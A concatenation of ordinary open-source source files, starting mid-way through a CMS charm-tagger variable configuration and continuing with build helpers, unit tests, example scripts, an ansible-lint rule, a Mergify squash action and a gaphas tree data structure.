idx = cms.int32(0),
name = cms.string('trackEtaRel_0'),
taggingVarName = cms.string('trackEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackEtaRel_1'),
taggingVarName = cms.string('trackEtaRel')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackDeltaR_0'),
taggingVarName = cms.string('trackDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackDeltaR_1'),
taggingVarName = cms.string('trackDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackPtRatio_0'),
taggingVarName = cms.string('trackPtRatio')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackPtRatio_1'),
taggingVarName = cms.string('trackPtRatio')
),
cms.PSet(
default = cms.double(1.1),
idx = cms.int32(0),
name = cms.string('trackPParRatio_0'),
taggingVarName = cms.string('trackPParRatio')
),
cms.PSet(
default = cms.double(1.1),
idx = cms.int32(1),
name = cms.string('trackPParRatio_1'),
taggingVarName = cms.string('trackPParRatio')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackJetDist_0'),
taggingVarName = cms.string('trackJetDist')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackJetDist_1'),
taggingVarName = cms.string('trackJetDist')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackDecayLenVal_0'),
taggingVarName = cms.string('trackDecayLenVal')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackDecayLenVal_1'),
taggingVarName = cms.string('trackDecayLenVal')
),
cms.PSet(
default = cms.double(0),
name = cms.string('jetNSecondaryVertices'),
taggingVarName = cms.string('jetNSecondaryVertices')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('jetNTracks'),
taggingVarName = cms.string('jetNTracks')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('trackSumJetEtRatio'),
taggingVarName = cms.string('trackSumJetEtRatio')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('trackSumJetDeltaR'),
taggingVarName = cms.string('trackSumJetDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexMass_0'),
taggingVarName = cms.string('vertexMass')
),
cms.PSet(
default = cms.double(-10),
idx = cms.int32(0),
name = cms.string('vertexEnergyRatio_0'),
taggingVarName = cms.string('vertexEnergyRatio')
),
cms.PSet(
default = cms.double(-999),
idx = cms.int32(0),
name = cms.string('trackSip2dSigAboveCharm_0'),
taggingVarName = cms.string('trackSip2dSigAboveCharm')
),
cms.PSet(
default = cms.double(-999),
idx = cms.int32(0),
name = cms.string('trackSip3dSigAboveCharm_0'),
taggingVarName = cms.string('trackSip3dSigAboveCharm')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('flightDistance2dSig_0'),
taggingVarName = cms.string('flightDistance2dSig')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('flightDistance3dSig_0'),
taggingVarName = cms.string('flightDistance3dSig')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexJetDeltaR_0'),
taggingVarName = cms.string('vertexJetDeltaR')
),
cms.PSet(
default = cms.double(0),
idx = cms.int32(0),
name = cms.string('vertexNTracks_0'),
taggingVarName = cms.string('vertexNTracks')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('massVertexEnergyFraction_0'),
taggingVarName = cms.string('massVertexEnergyFraction')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexBoostOverSqrtJetPt_0'),
taggingVarName = cms.string('vertexBoostOverSqrtJetPt')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonPtRel_0'),
taggingVarName = cms.string('leptonPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonPtRel_1'),
taggingVarName = cms.string('leptonPtRel')
),
cms.PSet(
default = cms.double(-10000),
idx = cms.int32(0),
name = cms.string('leptonSip3d_0'),
taggingVarName = cms.string('leptonSip3d')
),
cms.PSet(
default = cms.double(-10000),
idx = cms.int32(1),
name = cms.string('leptonSip3d_1'),
taggingVarName = cms.string('leptonSip3d')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonDeltaR_0'),
taggingVarName = cms.string('leptonDeltaR')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonDeltaR_1'),
taggingVarName = cms.string('leptonDeltaR')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonRatioRel_0'),
taggingVarName = cms.string('leptonRatioRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonRatioRel_1'),
taggingVarName = cms.string('leptonRatioRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonEtaRel_0'),
taggingVarName = cms.string('leptonEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonEtaRel_1'),
taggingVarName = cms.string('leptonEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonRatio_0'),
taggingVarName = cms.string('leptonRatio')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonRatio_1'),
taggingVarName = cms.string('leptonRatio')
))
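# These VPSets are meant to be plugged into the charm-tagger MVA configuration
# as its list of input variables, e.g. (illustrative assignment only; the
# consumer name below is not taken from this file):
#
#   someCharmTaggerComputer.variables = c_vs_l_vars_vpset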
|
buildchain/buildchain/utils.py | SaintLoong/metalk8s | 255 | 12686400 | # coding: utf-8
"""Miscellaneous helpers."""
import inspect
import subprocess
import sys
from pathlib import Path
from typing import Any, Callable, Iterator, List, Optional
from docker.types import Mount # type: ignore
from buildchain import config
from buildchain import constants
from buildchain import types
def export_only_tasks(module_name: str) -> List[str]:
"""Return the list of tasks defined in the specified module.
Arguments:
module_name: name of the module
Returns:
        The names of all the task-creators defined in this module.
"""
return [
name
for name, _ in inspect.getmembers(sys.modules[module_name], inspect.isfunction)
if name.startswith("task_")
]
def build_relpath(path: Path) -> Path:
"""Return the given path, but relative to the build root.
Arguments:
path: an absolute path inside the build directory
Returns:
The same path, but relative to the build directory.
Examples:
>>> build_relpath(Path('/home/foo/metalk8s/_build/metalk8s.iso'))
PosixPath('_build/metalk8s.iso')
"""
return path.relative_to(config.BUILD_ROOT.parent)
def title_with_target1(command: str) -> Callable[[types.Task], str]:
"""Return a title with the command suffixed with the first target.
Arguments:
command: name of the command
task: a doit task
Returns:
A function that returns the title
"""
def title(task: types.Task) -> str:
return "{cmd: <{width}} {path}".format(
cmd=command,
width=constants.CMD_WIDTH,
path=build_relpath(Path(task.targets[0])),
)
return title
def title_with_subtask_name(command: str) -> Callable[[types.Task], str]:
"""Return a title with the command suffixed with the sub-task name.
Arguments:
command: name of the command
task: a doit task
Returns:
A function that returns the title
"""
def title(task: types.Task) -> str:
# Extract the sub-task name (the part after `:`) from the task name.
return "{cmd: <{width}} {name}".format(
cmd=command, width=constants.CMD_WIDTH, name=task.name.split(":")[1]
)
return title
def bind_mount(source: Path, target: Path, **kwargs: Any) -> Mount:
"""Return a Docker mount object.
Arguments:
source: the host path to be mounted
target: the container path the source should be mounted to
Keyword arguments:
Passed through to the underlying docker.services.Mount object
initialization
"""
return Mount(source=str(source), target=str(target), type="bind", **kwargs)
def bind_ro_mount(source: Path, target: Path) -> Mount:
"""Return *read-only* Docker mount object.
Arguments:
source: the host path to be mounted
target: the container path the source should be mounted to
"""
return bind_mount(source=source, target=target, read_only=True)
def git_ls(directory: Optional[str] = None) -> Iterator[Path]:
"""Return the list of files tracked by Git under `root` (recursively).
Arguments:
directory: directory to list (relative to the root of the repo).
Returns:
A list of files tracked by Git.
"""
root = constants.ROOT if directory is None else constants.ROOT / directory
assert root.is_dir()
return map(
Path,
subprocess.check_output(
["git", "ls-files", "-z", root], encoding="utf-8"
).split("\x00")[:-1],
) # `:-1` to skip the last element (empty string).
def unlink_if_exist(filepath: Path) -> None:
"""Delete a file if it exists."""
try:
filepath.unlink()
except FileNotFoundError:
pass
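# Illustrative usage of the helpers above (paths are examples only):
#
#   salt_mount = bind_ro_mount(source=constants.ROOT / "salt",
#                              target=Path("/srv/salt"))
#   tracked = list(git_ls("buildchain"))
#   unlink_if_exist(config.BUILD_ROOT / "metalk8s.iso")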
|
third_party/blink/tools/diff_wpt_results_unittest.py | iridium-browser/iridium-browser | 575 | 12686420
#!/usr/bin/env vpython
# Copyright (C) 2021 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import copy
import io
import unittest
from diff_wpt_results import map_tests_to_results, create_csv
CSV_HEADING = 'Test name, Test Result, Baseline Result, Result Comparison'
class JsonResultsCompressTest(unittest.TestCase):
def test_compress_json(self):
output_mp = {}
input_mp = {'dir1': {'dir2': {'actual': 'PASS'}}}
map_tests_to_results(output_mp, input_mp)
self.assertEquals(output_mp, {'dir1/dir2': {'actual': 'PASS'}})
class CreateCsvTest(unittest.TestCase):
def test_name_with_comma_escaped_in_csv(self):
actual_mp = {'test, name.html': {'actual': 'PASS'}}
with io.BytesIO() as csv_out:
create_csv(actual_mp, actual_mp, csv_out)
csv_out.seek(0)
content = csv_out.read()
self.assertEquals(content, CSV_HEADING + '\n' +
'"test, name.html",PASS,PASS,SAME RESULTS\n')
def test_create_csv_with_same_result(self):
actual_mp = {'test.html': {'actual': 'PASS'}}
with io.BytesIO() as csv_out:
create_csv(actual_mp, actual_mp, csv_out)
csv_out.seek(0)
content = csv_out.read()
self.assertEquals(content, CSV_HEADING + '\n' +
'test.html,PASS,PASS,SAME RESULTS\n')
def test_create_csv_with_different_result(self):
actual_mp = {'test.html': {'actual': 'PASS'}}
baseline_mp = copy.deepcopy(actual_mp)
baseline_mp['test.html']['actual'] = 'FAIL'
with io.BytesIO() as csv_out:
create_csv(actual_mp, baseline_mp, csv_out)
csv_out.seek(0)
content = csv_out.read()
self.assertEquals(content, CSV_HEADING + '\n' +
'test.html,PASS,FAIL,DIFFERENT RESULTS\n')
def test_create_csv_with_missing_result(self):
actual_mp = {'test.html': {'actual': 'PASS'}}
with io.BytesIO() as csv_out:
create_csv(actual_mp, {}, csv_out)
csv_out.seek(0)
content = csv_out.read()
self.assertEquals(content, CSV_HEADING + '\n' +
'test.html,PASS,MISSING,MISSING RESULTS\n')
if __name__ == '__main__':
unittest.main()
|
src/python/k4a/examples/simple_viewer.py | seanyen/Azure-Kinect-Sensor-SDK | 1,120 | 12686421 | '''
simple_viewer.py
A simple viewer to demonstrate the image capture capabilities of an Azure
Kinect device using the Python API. This is not the fastest way to display
a sequence of images; this is only meant to show how to capture frames
in a sequence.
Requirements:
Users should install the following python packages before using this module:
matplotlib
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.
Kinect For Azure SDK.
'''
# This package is used for displaying the images.
# It is not part of the k4a package and is not a hard requirement for k4a.
# Users need to install these packages in order to use this module.
import matplotlib.pyplot as plt
# This will import all the public symbols into the k4a namespace.
import k4a
def simple_viewer():
# Open a device using the static function Device.open().
device = k4a.Device.open()
# In order to start capturing frames, need to start the cameras.
# The start_cameras() function requires a device configuration which
# specifies the modes in which to put the color and depth cameras.
# For convenience, the k4a package pre-defines some configurations
# for common usage of the Azure Kinect device, but the user can
# modify the values to set the device in their preferred modes.
device_config = k4a.DEVICE_CONFIG_BGRA32_2160P_WFOV_2X2BINNED_FPS15
device.start_cameras(device_config)
# Get a capture.
# The -1 tells the device to wait forever until a capture is available.
capture = device.get_capture(-1)
# Open a matplotlib figure to display images.
fig = plt.figure()
ax = []
ax.append(fig.add_subplot(1, 3, 1, label="Color"))
ax.append(fig.add_subplot(1, 3, 2, label="Depth"))
ax.append(fig.add_subplot(1, 3, 3, label="IR"))
# The capture has the following fields that can be read right away:
# color : the color image
# depth : the depth image
# ir : the ir image
im = []
im.append(ax[0].imshow(capture.color.data))
im.append(ax[1].imshow(capture.depth.data, cmap='jet'))
im.append(ax[2].imshow(capture.ir.data, cmap='gray'))
ax[0].title.set_text('Color')
ax[1].title.set_text('Depth')
ax[2].title.set_text('IR')
# Note: The data in the images is in BGRA planes, but the matplotlib
# library expects them to be in RGBA. This results in an inverted color
# display if not properly handled. The user can splice the planes as
# appropriate or use opencv which has a function call to transform
# BGRA into RGBA.
while fig is not None:
# Draw the figure with the images.
plt.pause(.1)
plt.draw()
# Get a new capture.
capture = device.get_capture(-1)
if capture is None:
del fig
break
# Update the images in the figures.
im[0].set_data(capture.color.data)
im[1].set_data(capture.depth.data)
im[2].set_data(capture.ir.data)
# There is no need to delete the capture since Python will take care of
# that in the object's deleter.
# There is no need to stop the cameras since the deleter will stop
# the cameras, but it's still prudent to do it explicitly.
device.stop_cameras()
# There is no need to delete resources since Python will take care
# of releasing resources in the objects' deleters.
if __name__ == '__main__':
simple_viewer()
|
lib/pypng-0.0.9/code/exnumpy.py | ceremetrix/X | 460 | 12686429
#!/usr/bin/env python
# $URL: http://pypng.googlecode.com/svn/trunk/code/exnumpy.py $
# $Rev: 126 $
# Numpy example.
# Original code created by <NAME>, modified by <NAME>.
'''
Example code integrating RGB PNG files, PyPNG and NumPy
(abstracted from Mel Raab's functioning code)
'''
# http://www.python.org/doc/2.4.4/lib/module-itertools.html
import itertools
import numpy
import png
''' If you have a PNG file for an RGB image,
and want to create a numpy array of data from it.
'''
# Read the file "picture.png" from the current directory. The `Reader`
# class can take a filename, a file-like object, or the byte data
# directly; this suggests alternatives such as using urllib to read
# an image from the internet:
# png.Reader(file=urllib.urlopen('http://www.libpng.org/pub/png/PngSuite/basn2c16.png'))
pngReader=png.Reader(filename='picture.png')
# Tuple unpacking, using multiple assignment, is very useful for the
# result of asDirect (and other methods).
# See
# http://docs.python.org/tutorial/introduction.html#first-steps-towards-programming
row_count, column_count, pngdata, meta = pngReader.asDirect()
bitdepth=meta['bitdepth']
plane_count=meta['planes']
# Make sure we're dealing with RGB files
assert plane_count == 3
''' Boxed row flat pixel:
list([R,G,B, R,G,B, R,G,B],
[R,G,B, R,G,B, R,G,B])
Array dimensions for this example: (2,9)
Create `image_2d` as a two-dimensional NumPy array by stacking a
sequence of 1-dimensional arrays (rows).
The NumPy array mimics PyPNG's (boxed row flat pixel) representation;
it will have dimensions ``(row_count,column_count*plane_count)``.
'''
# The use of ``numpy.uint16``, below, is to convert each row to a NumPy
# array with data type ``numpy.uint16``. This is a feature of NumPy,
# discussed further in
# http://docs.scipy.org/doc/numpy/user/basics.types.html .
# You can avoid the explicit conversion with
# ``numpy.vstack(pngdata)``, but then NumPy will pick the array's data
# type; in practice it seems to pick ``numpy.int32``, which is large enough
# to hold any pixel value for any PNG image but uses 4 bytes per value when
# 1 or 2 would be enough.
# --- extract 001 start
image_2d = numpy.vstack(itertools.imap(numpy.uint16, pngdata))
# --- extract 001 end
# Do not be tempted to use ``numpy.asarray``; when passed an iterator
# (`pngdata` is often an iterator) it will attempt to create a size 1
# array with the iterator as its only element.
# An alternative to the above is to create the target array of the right
# shape, then populate it row by row:
if 0:
image_2d = numpy.zeros((row_count,plane_count*column_count),
dtype=numpy.uint16)
for row_index, one_boxed_row_flat_pixels in enumerate(pngdata):
image_2d[row_index,:]=one_boxed_row_flat_pixels
del pngReader
del pngdata
''' Reconfigure for easier referencing, similar to
Boxed row boxed pixel:
list([ (R,G,B), (R,G,B), (R,G,B) ],
[ (R,G,B), (R,G,B), (R,G,B) ])
Array dimensions for this example: (2,3,3)
``image_3d`` will contain the image as a three-dimensional numpy
array, having dimensions ``(row_count,column_count,plane_count)``.
'''
# --- extract 002 start
image_3d = numpy.reshape(image_2d,
(row_count,column_count,plane_count))
# --- extract 002 end
''' ============= '''
''' Convert NumPy image_3d array to PNG image file.
If the data is three-dimensional, as it is above, the best thing
to do is reshape it into a two-dimensional array with a shape of
``(row_count, column_count*plane_count)``. Because a
two-dimensional numpy array is an iterator, it can be passed
directly to the ``png.Writer.write`` method.
'''
row_count, column_count, plane_count = image_3d.shape
assert plane_count==3
pngfile = open('picture_out.png', 'wb')
try:
# This example assumes that you have 16-bit pixel values in the data
# array (that's what the ``bitdepth=16`` argument is for).
# If you don't, then the resulting PNG file will likely be
# very dark. Hey, it's only an example.
pngWriter = png.Writer(column_count, row_count,
greyscale=False,
alpha=False,
bitdepth=16)
# As of 2009-04-13 passing a numpy array that has an element type
# that is a numpy integer type (for example, the `image_3d` array has an
# element type of ``numpy.uint16``) generates a deprecation warning.
# This is probably a bug in numpy; it may go away in the future.
# The code still works despite the warning.
# See http://code.google.com/p/pypng/issues/detail?id=44
# --- extract 003 start
pngWriter.write(pngfile,
numpy.reshape(image_3d, (-1, column_count*plane_count)))
# --- extract 003 end
finally:
pngfile.close()
|
src/ansiblelint/rules/key_order.py | willthames/ansible-lint | 1,192 | 12686432 """All tasks should have name come first."""
import sys
from typing import Any, Dict, Optional, Union
from ansiblelint.file_utils import Lintable
from ansiblelint.rules import AnsibleLintRule
from ansiblelint.testing import RunFromText
class KeyOrderRule(AnsibleLintRule):
"""Ensure specific order of keys in mappings."""
id = "key-order"
shortdesc = __doc__
severity = "LOW"
tags = ["formatting", "experimental"]
version_added = "v6.2.0"
needs_raw_task = True
def matchtask(
self, task: Dict[str, Any], file: Optional[Lintable] = None
) -> Union[bool, str]:
raw_task = task["__raw_task__"]
if "name" in raw_task:
attribute_list = [*raw_task]
if bool(attribute_list[0] != "name"):
return "'name' key is not first"
return False
# testing code to be loaded only with pytest or when executed the rule file
if "pytest" in sys.modules:
import pytest
PLAY_FAIL = """---
- hosts: localhost
tasks:
- no_log: true
shell: echo hello
name: task with no_log on top
- when: true
name: task with when on top
shell: echo hello
- delegate_to: localhost
name: delegate_to on top
shell: echo hello
- loop:
- 1
- 2
name: loopy
command: echo {{ item }}
- become: true
name: become first
shell: echo hello
- register: test
shell: echo hello
name: register first
"""
PLAY_SUCCESS = """---
- hosts: localhost
tasks:
- name: test
command: echo "test"
- name: test2
debug:
msg: "Debug without a name"
- name: Flush handlers
meta: flush_handlers
- no_log: true # noqa key-order
shell: echo hello
name: task with no_log on top
"""
@pytest.mark.parametrize("rule_runner", (KeyOrderRule,), indirect=["rule_runner"])
def test_task_name_has_name_first_rule_pass(rule_runner: RunFromText) -> None:
"""Test rule matches."""
results = rule_runner.run_playbook(PLAY_SUCCESS)
assert len(results) == 0
@pytest.mark.parametrize("rule_runner", (KeyOrderRule,), indirect=["rule_runner"])
def test_task_name_has_name_first_rule_fail(rule_runner: RunFromText) -> None:
"""Test rule matches."""
results = rule_runner.run_playbook(PLAY_FAIL)
assert len(results) == 6
|
examples/fib.py | chen3feng/pywasm | 337 | 12686438
import pywasm
# pywasm.on_debug()
runtime = pywasm.load('./examples/fib.wasm')
r = runtime.exec('fib', [10])
print(r)
|
cloudbio/custom/galaxy.py | glebkuznetsov/cloudbiolinux | 122 | 12686457
"""
Install any components that fall under 'galaxy' directive in main.yaml
"""
from cloudbio.galaxy import _setup_users
from cloudbio.galaxy import _setup_galaxy_env_defaults
from cloudbio.galaxy import _install_galaxy
from cloudbio.galaxy import _configure_galaxy_options
def install_galaxy_webapp(env):
_prep_galaxy(env)
_install_galaxy(env)
_configure_galaxy_options(env)
def _prep_galaxy(env):
_setup_users(env)
_setup_galaxy_env_defaults(env)
|
mergify_engine/actions/squash.py | truthiswill/mergify-engine | 266 | 12686459 | <reponame>truthiswill/mergify-engine<gh_stars>100-1000
# -*- encoding: utf-8 -*-
#
# Copyright © 2021 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import typing
import voluptuous
from mergify_engine import actions
from mergify_engine import check_api
from mergify_engine import context
from mergify_engine import rules
from mergify_engine import signals
from mergify_engine import squash_pull
from mergify_engine.actions import utils as action_utils
from mergify_engine.dashboard import subscription
from mergify_engine.rules import types
class SquashAction(actions.Action):
flags = (
actions.ActionFlag.ALLOW_AS_ACTION
| actions.ActionFlag.ALLOW_AS_COMMAND
| actions.ActionFlag.ALWAYS_RUN
| actions.ActionFlag.ALLOW_ON_CONFIGURATION_CHANGED
| actions.ActionFlag.DISALLOW_RERUN_ON_OTHER_RULES
)
validator = {
voluptuous.Required("bot_account", default=None): voluptuous.Any(
None, types.Jinja2
),
voluptuous.Required("commit_message", default="all-commits"): voluptuous.Any(
"all-commits", "first-commit", "title+body"
),
}
@staticmethod
def command_to_config(string: str) -> typing.Dict[str, typing.Any]:
if string:
return {"commit_message": string.strip()}
else:
return {}
async def run(
self, ctxt: context.Context, rule: rules.EvaluatedRule
) -> check_api.Result:
try:
bot_account = await action_utils.render_bot_account(
ctxt,
self.config["bot_account"],
required_feature=subscription.Features.BOT_ACCOUNT,
missing_feature_message="Squash with `bot_account` set are disabled",
required_permissions=[],
)
except action_utils.RenderBotAccountFailure as e:
return check_api.Result(e.status, e.title, e.reason)
if ctxt.pull["commits"] <= 1:
return check_api.Result(
check_api.Conclusion.SUCCESS,
"Pull request is already one-commit long",
"",
)
try:
commit_title_and_message = await ctxt.pull_request.get_commit_message()
except context.RenderTemplateFailure as rmf:
return check_api.Result(
check_api.Conclusion.ACTION_REQUIRED,
"Invalid commit message",
str(rmf),
)
if commit_title_and_message is not None:
title, message = commit_title_and_message
message = f"{title}\n\n{message}"
elif self.config["commit_message"] == "all-commits":
message = f"{(await ctxt.pull_request.title)} (#{(await ctxt.pull_request.number)})\n"
message += "\n\n* ".join(
[commit["commit_message"] for commit in await ctxt.commits]
)
elif self.config["commit_message"] == "first-commit":
message = (await ctxt.commits)[0]["commit_message"]
elif self.config["commit_message"] == "title+body":
message = f"{(await ctxt.pull_request.title)} (#{(await ctxt.pull_request.number)})"
message += f"\n\n{await ctxt.pull_request.body}"
else:
raise RuntimeError("Unsupported commit_message option")
try:
await squash_pull.squash(
ctxt,
message,
bot_account,
)
except squash_pull.SquashFailure as e:
return check_api.Result(
check_api.Conclusion.FAILURE, "Pull request squash failed", e.reason
)
else:
await signals.send(ctxt, "action.squash")
return check_api.Result(
check_api.Conclusion.SUCCESS, "Pull request squashed successfully", ""
)
async def cancel(
self, ctxt: context.Context, rule: "rules.EvaluatedRule"
) -> check_api.Result: # pragma: no cover
return actions.CANCELLED_CHECK_REPORT
|
gaphas/tree.py | gaphor/gaphas | 108 | 12686461 | """Simple class containing the tree structure for the canvas items."""
from typing import Dict, Generic, Iterable, List, Optional, Sequence, TypeVar, Union
T = TypeVar("T")
class Tree(Generic[T]):
"""A Tree structure. Nodes are stores in a depth-first order.
``None`` is the root node.
@invariant: len(self._children) == len(self._nodes) + 1
"""
def __init__(self) -> None:
# List of nodes in the tree, sorted in the order they ought to be
# rendered
self._nodes: List[T] = []
# Per entry a list of children is maintained.
self._children: Dict[Union[T, None], List[T]] = {None: []}
# For easy and fast lookups, also maintain a child -> parent mapping
self._parents: Dict[T, T] = {}
@property
def nodes(self) -> Sequence[T]:
return list(self._nodes)
def get_parent(self, node: T) -> Optional[T]:
"""Return the parent item of ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.get_parent('n2')
'n1'
"""
return self._parents.get(node)
def get_children(self, node: Optional[T]) -> Iterable[T]:
"""Return all child objects of ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_children('n1')
['n2', 'n3']
>>> tree.get_children('n2')
[]
"""
return self._children[node]
def get_siblings(self, node: T) -> List[T]:
"""Get all siblings of ``node``, including ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_siblings('n2')
['n2', 'n3']
"""
parent = self.get_parent(node)
return self._children[parent]
def get_next_sibling(self, node: T) -> T:
"""Return the node on the same level after ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_next_sibling('n2')
'n3'
>>> tree.get_next_sibling('n3') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: list index out of range
"""
parent = self.get_parent(node)
siblings = self._children[parent]
return siblings[siblings.index(node) + 1]
def get_previous_sibling(self, node: T) -> T:
"""Return the node on the same level before ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_previous_sibling('n3')
'n2'
>>> tree.get_previous_sibling('n2') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: list index out of range
"""
parent = self.get_parent(node)
siblings = self._children[parent]
index = siblings.index(node) - 1
if index < 0:
raise IndexError("list index out of range")
return siblings[index]
def get_all_children(self, node: T) -> Iterable[T]:
"""Iterate all children (and children of children and so forth)
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n2')
>>> tree.get_children('n1')
['n2']
>>> tree.get_all_children('n1') # doctest: +ELLIPSIS
<generator object Tree.get_all_children at 0x...>
>>> list(tree.get_all_children('n1'))
['n2', 'n3']
"""
children = self.get_children(node)
for c in children:
yield c
yield from self.get_all_children(c)
def get_ancestors(self, node: T) -> Iterable[T]:
"""Iterate all parents and parents of parents, etc.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n2')
>>> tree.get_parent('n3')
'n2'
>>> tree.get_ancestors('n3') # doctest: +ELLIPSIS
<generator object Tree.get_ancestors at 0x...>
>>> list(tree.get_ancestors('n3'))
['n2', 'n1']
>>> list(tree.get_ancestors('n1'))
[]
"""
parent = self.get_parent(node)
while parent:
yield parent
parent = self.get_parent(parent)
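    # order() filters an iterable down to known nodes while preserving the
    # depth-first storage order, e.g. with nodes ['n1', 'n2', 'n3'] stored,
    # order(['n3', 'n1']) yields 'n1' then 'n3'.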
def order(self, items: Iterable[T]) -> Iterable[T]:
items_set = set(items)
return (n for n in self._nodes if n in items_set)
def _add_to_nodes(
self, node: T, parent: Optional[T], index: Optional[int] = None
) -> None:
"""Helper method to place nodes on the right location in the nodes list
Called only from add() and move()"""
nodes = self._nodes
siblings = self._children[parent]
try:
atnode = siblings[index] # type: ignore[index]
except (TypeError, IndexError):
index = len(siblings)
if parent:
try:
next_uncle = self.get_next_sibling(parent)
except IndexError:
                # parent has no younger siblings..
                # fall back to placing the node relative to the grandparent:
return self._add_to_nodes(node, self.get_parent(parent))
else:
nodes.insert(nodes.index(next_uncle), node)
else:
# append to root node:
nodes.append(node)
else:
nodes.insert(nodes.index(atnode), node)
def _add(
self, node: T, parent: Optional[T] = None, index: Optional[int] = None
) -> None:
"""Helper method for both add() and move()."""
assert node not in self._nodes
siblings = self._children[parent]
self._add_to_nodes(node, parent, index)
# Fix parent-child and child-parent relationship
try:
siblings.insert(index, node) # type: ignore[arg-type]
except TypeError:
siblings.append(node)
        # Record the parent so child -> parent lookups stay consistent:
if parent:
self._parents[node] = parent
def add(
self, node: T, parent: Optional[T] = None, index: Optional[int] = None
) -> None:
"""Add node to the tree. parent is the parent node, which may be None
if the item should be added to the root item.
For usage, see the unit tests.
"""
self._add(node, parent, index)
self._children[node] = []
def _remove(self, node: T) -> None:
# Remove from parent item
self.get_siblings(node).remove(node)
# Remove data entries:
del self._children[node]
self._nodes.remove(node)
try:
del self._parents[node]
except KeyError:
pass
def remove(self, node: T) -> None:
"""Remove ``node`` from the tree.
For usage, see the unit tests.
"""
# First remove children:
for c in reversed(list(self._children[node])):
self.remove(c)
self._remove(node)
def _reparent_nodes(self, node: T, parent: Optional[T]) -> None:
"""Helper for move().
The _children and _parent trees can be left intact as far as
children of the reparented node are concerned. Only the position
in the _nodes list changes.
"""
self._nodes.remove(node)
self._add_to_nodes(node, parent)
for c in self._children[node]:
self._reparent_nodes(c, node)
